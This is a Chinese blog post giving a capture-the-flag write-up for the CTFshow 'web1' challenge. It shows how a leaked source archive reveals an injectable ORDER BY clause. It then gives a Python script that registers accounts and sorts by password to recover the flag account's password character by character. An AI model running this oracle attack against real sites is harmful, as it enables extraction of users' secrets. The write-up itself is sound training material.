ctfshow CTFshow web1 wp

最新推荐文章于 2024-07-22 17:12:10 发布
最新推荐文章于 2024-07-22 17:12:10 发布
阅读量154 收藏
点赞数 3
分类专栏: web 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jwkaaaaaa/article/details/140409096
版权

打开后是一个登录框,尝试一下sql注入发现不太行,于是先扫目录,发现一个www.zip。解压后审计一下,发现好多函数被过滤掉了,同时也发现其中存在select * from user order by $order,因此可以将user_main页的任意参数进行排序。而本题题目中说到flag在指定用户的密码中,显然就是在flag账号的密码中,暴力破解是不可能的,sql注入也不太能完成,但是这里存在对密码的排序,因此可以通过疯狂注册账号,不断地改变注册账号的密码来爆破出flag的密码。

脚本如下:

import requests

url='https://c5934155-d5e3-41c2-a5ae-fc0db6623f2e.challenge.ctf.show/'
url_reg='https://c5934155-d5e3-41c2-a5ae-fc0db6623f2e.challenge.ctf.show/reg.php'
url_login='https://c5934155-d5e3-41c2-a5ae-fc0db6623f2e.challenge.ctf.show/login.php'
url_chaxun='https://c5934155-d5e3-41c2-a5ae-fc0db6623f2e.challenge.ctf.show/user_main.php?order=pwd'

flag='ctfshow{b796d0af-3f81-4fe2-99a2-445f3ef37b03'
s="-.0123456789:abcdefghijklmnopqrstuvwxyz{|}~"
for i in range(45):
    for j in s:
        passwd=""
        passwd=flag+j
        pass_true=chr(ord(j)-1)
        data1={'username':passwd,
        'email':'c',
        'nickname':'c',
        'password':passwd
        }
        data2 = {'username':passwd,
        'password':passwd
        }
        session=requests.session()
        response_reg=session.post(url_reg,data1)
        response_login=session.post(url_login,data2)
        response_chaxun=session.get(url_chaxun)
        ans=response_chaxun.text
        if ans.index("<td>"+passwd+"</td>")>ans.index("<td>flag_is_my_password</td>"):
            flag+=pass_true
            print(flag)
            break

结果如下:

将最后的|替换成}即可。

流星划过小凯
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow web入门 wp web1--web11
2301_81040377的博客
03-30 819
生产环境下使用vim/vi修改文件时,发生意外时会产生一个后缀为.swp的隐藏文件,第二次意外退出的时候生成的备份文件后缀为:.swo;先说一下我的心路历程我打算快乐的开始web的时候,结果打不开靶机,一看VIP一会几十就能搞定,结果没想到599,哦豁,我太痛了,我必须好好卷,不然对不起我这599。php源码这个相当于废话因为我做了几十道题了基本源码都是php(为此专门学了php的 相关知识)靶机没了,我去找了几个随便的网站进行查询都没有结果,去查了一下。拿去提交,vocal,不对,那么在网页里面吧应该。
CTFShow-Web篇详细wp(持续更新中ing)
Aluxian_的博客
04-23 1048
【代码】CTFShow-Web篇详细wp
ctfshow大吉大利杯web wp
想变得强大,虽然现在还弱不禁风
01-26 639
这次的比赛web因为种种原因就做出两道。 不过也学到了东西。 有手就行 打开网页F12发现有这个东西,很明显是base64转图片,记得加上头 然后发现这么个东西 回看url 试一下?file=flag,又得到一串base64 得到一个小程序码,进去之后发现要点5700多万下。**加粗样式**发现鼠标连点器只能一秒100下,不现实。 网上搜了一下,发现微信小程序可以反编译。照着教程弄了一下,直接在反编译的文件里ctrl f 发现flag. spaceman 应该是非预期了 绕过下划线就行。 x
Ctfshow web-web7 WP
qq_45427131的博客
05-12 440
首先讲一下数据库的判断 基础知识: select ascii(substr(database(),1,1))=119 ; 上面这段话的意思,可以分布理解 1、 首先是ascii()函数 , 熟悉mysql的应该知道,这是查询字符ascii码的 2、A的ascii码是65 a的ascii码是97 3、Substr()的函数作用是截取,有点类似于limit的作用 Substr(需要截取的字符串,开始位置,截取长度) 4、举个例子,当前我选中mysql数据库,尝试用select substr
WP1-ctfshow
02-24
1
WP2-ctfshow
02-24
2
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
实验吧WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目的WP,其中也有别人的WP
“微软蓝屏”事件暴露了网络安全哪些问题?
最新发布
weixin_62595121的博客
07-22 976
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。中国国际问题研究院助理研究员 谢卉:私营部门在技术发展和创新上处于前沿,拥有很大的主导权,但是他们现在和公共利益的联系也越来越紧密,因此要加强对私营部门的监管,让他们投资建设更为可靠的网络基础设施,减少由单点故障带来的风险。报道称,英国多家药店的支付功能也一度出现问题。
FairGuard游戏加固入选《嘶吼2024网络安全产业图谱》
FairGuard手游加固(企业官方博客)
07-19 380
FairGuard游戏加固作为游戏安全行业领先的第三方服务商,凭借技术创新、产品服务及市场反馈等多方面优异表现获得业界认可,实力入选移动应用安全细分领域。
用AI对抗AI:Fortinet解锁家电制造网络安全新密码
Fortinet_CHINA的博客
07-19 880
Fortinet盛大启幕《构筑垂直行业 网络安全防线》系列研讨会。Fortinet中国南区资深安全顾问黄志攀深入洞察家电制造行业的网络安全挑战,全面解析了Fortinet如何通过全栈AI技术重塑OT安全解决方案,以应对复杂多变的威胁环境。家电制造行业网络安全深度分析家电制造产线的安全现状普遍令人担忧,主要体现在网络架构的两极分化、显著的安全与管理风险、安全区域划分的缺失,以及OT网络面临的直接威胁。
静态IP地址在网络安全中的角色解析与实测分析
2401_85937702的博客
07-19 900
在这个网络边界日益模糊的时代,每一次点击、每一次数据传输都有着安全问题。作为网络安全体系中的基石,静态IP地址的角色显得尤为重要而复杂。今天,我们的测评团队将带您深入剖析静态IP地址在网络安全中的多重角色,并通过两家代理服务商的实测分析,为您揭开其在实际应用中的神秘面纱。
【网络安全】CrowdStrike 的 Falcon Sensor 软件导致 Linux 内核崩溃
par@ish的博客
07-22 771
CrowdStrike的Falcon Sensor软件,上周导致大量Windows电脑出现蓝屏故障,现在还被发现Linux内核系统崩溃也与CrowdStrike有关。六月份,Red Hat警告其客户在使用版本为5.14.0-427.13.1.el9_4.x86_64的内核启动后,由Falcon Sensor进程引发的“Kernel panic”问题,影响了部分Red Hat Enterprise Linux 9.4用户。
网站验证:确保网络安全与信任的重要步骤
07-22 184
在数字时代,网站验证是确保网络安全和建立用户信任的关键措施。随着网络诈骗和恶意软件的日益增多,验证网站的真实性和安全性变得尤为重要。本文将探讨网站验证的重要性、常见的验证方法以及如何通过验证提升用户体验和网站信誉。
2024年数字中国创新第四届红明谷杯网络安全大赛WP
渗透测试研究中心
07-21 491
WEB ezphp 题目描述:一支专注于卫星通信技术的研究团队正在努力改进他们的通信系统,以提高数据传输的效率和安全性,团队决定采用PHP 8.3.2来完善通信系统开发。 考点:php filter chain Oracle PHP Filter链——基于oracle的文件读取攻击 参考:https://xz.aliyun.com/t/12939?time__1311=mqmhqIx%2Bx...
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 276
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
【DVWA靶场】web安全漏洞-文件上传+文件包含(详细复现教程)
weixin_60838266的博客
07-21 1002
DVWA靶场漏洞复现之文件上传+文件包含。
ctfshow web 电子取证
08-21
- *1* *2* *3* [ctfshow终极考核wp](https://blog.csdn.net/weixin_46270220/article/details/122543062)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值